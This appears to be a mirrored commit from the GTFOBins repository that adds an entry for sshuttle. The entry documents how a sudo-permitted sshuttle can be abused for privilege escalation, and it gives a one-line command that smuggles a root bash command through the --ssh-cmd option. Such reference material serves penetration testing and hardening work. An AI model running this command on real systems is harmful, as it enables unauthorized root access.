mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Create sshuttle.md
This commit is contained in:
parent
6696d463cd
commit
11c69d5497
7
_gtfobins/sshuttle.md
Normal file
7
_gtfobins/sshuttle.md
Normal file
@ -0,0 +1,7 @@
|
|||||||
|
---
|
||||||
|
functions:
|
||||||
|
sudo:
|
||||||
|
- description: If the binary is allowed to run as superuser by sudo, it does not drop the elevated privileges and may be used to access the file system, escalate or maintain privileged access. The output of the executed command is in /tmp/root_id
|
||||||
|
code: |
|
||||||
|
sudo sshuttle -r root@anything --ssh-cmd "/bin/bash -c 'id>/tmp/root_id'" 192.168.3.3
|
||||||
|
---
|
Loading…
Reference in New Issue
Block a user